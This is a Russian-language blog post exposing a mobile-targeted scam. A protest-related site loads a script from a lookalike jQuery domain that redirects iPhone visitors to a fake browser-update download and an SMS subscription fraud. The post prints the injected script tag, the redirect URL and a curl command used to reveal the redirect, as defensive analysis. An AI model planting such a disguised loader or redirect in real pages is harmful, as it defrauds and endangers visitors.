Домен зарегистрирован не так давно:
domain: MARSH-MILLIONOV.RU
nserver: ns67.iphoster.ru.
nserver: ns68.iphoster.ru.
state: REGISTERED, DELEGATED, VERIFIED
person: Private Person
registrar: REGRU-REG-RIPN
admin-contact:
created: 2012.06.17
paid-till: 2013.06.17
free-date: 2013.07.18
source: TCI
В исходном коде страницы этого сайта содержится следующая строчка:
<script type="text/javascript" src="http://jquery-library.ru/jl.php?share=9,15,29,39,7,10,14,16,24,34,35,38,41"></script>
Домен-пародия на адрес сайта библиотеки jquery зарегистрирован подозрительно почти в то же самое время, что и marsh-millionov.ru:
domain: JQUERY-LIBRARY.RU
nserver: ns1.jquery-library.ru. 37.230.115.10
nserver: ns2.jquery-library.ru. 62.109.26.137
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
registrar: REGRU-REG-RIPN
admin-contact:
created: 2012.08.01
paid-till: 2013.08.01
free-date: 2013.09.01
source: TCI
Если вышеуказанный URL открыть на компьютере, то загрузятся невинные счетчики. Но что если открыть ее с мобильного устройства?
$ curl -A "Mozilla/5.0 (iPhone; CPU iPhone OS 6_0_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A525 Safari/8536.25"
-e "http://marsh-millionov.ru/" "http://jquery-library.ru/jl.php?share=9,15,29,39,7,10,14,16,24,34,35,38,41"
location.replace('http://brouser04.net/?a=u274v214z4y2x4u2w4x2t2t2y3q2x454s2w26433a4y294w274&subid=2&auto=5');
Пользователя перенаправит на мутный сайт brouser04.net, который загрузит ему джава-файл browser_update_installer.jar. Этот файл изобразит бурную деятельность по анализу чего-то там, а затем попросит ввести номер телефона. На телефон придет СМС-ка, на нее нужно будет ответить, в общем, банальный скам.
Домен, кстати, создан тоже недавно:
Domain brouser04.net
Date Registered: 2012-10-15
Date Modified: 2012-10-15
Expiry Date: 2013-10-15
DNS1: ns3.superidns.net
DNS2: ns4.superidns.net
Registrant
Fundacion Private Whois
Domain Administrator
Email:507c06ba7wzpib8z@t02cduv4f7f99a255f64.privatewhois.net
Attn: brouser04.net
Aptds. 0850-00056
Zona 15 Panama
Panama
Tel: +507.65995877
Сколько сотен или тысяч людей в субботу со своих планшетиков и телефончиков отправят СМС на заветный номер, желая посмотреть, как жители столицы морозят носы на Болотной площади (или где там будет проходить весь этот парад)?
Вот как это выглядит на айфоне:
Примечательно, что в этом случае под удар попадают исключительно пользователи мобильных устройств. Всякие винлокеры и прочие перехватчики сочетаний клавиш в настольных браузерах стали уже притчей во языцех. И все больше пользователей ставят NoScript, AdBlock и другие расширения безопасности. Да и антивирусы уже давно умеют анализировать HTTP-трафик и ловить сомнительные редиректы. А вот на мобильных устройствах пока раздолье - много ли вы видели айфонов с блокираторами скриптов и отключенной джавой?
P.S.: Я не знаю, зачем я это написал. Я наткнулся на этот сайт случайно и мне просто хотелось показать вам красивые картинки с пятого айфона в четыре часа ночи.
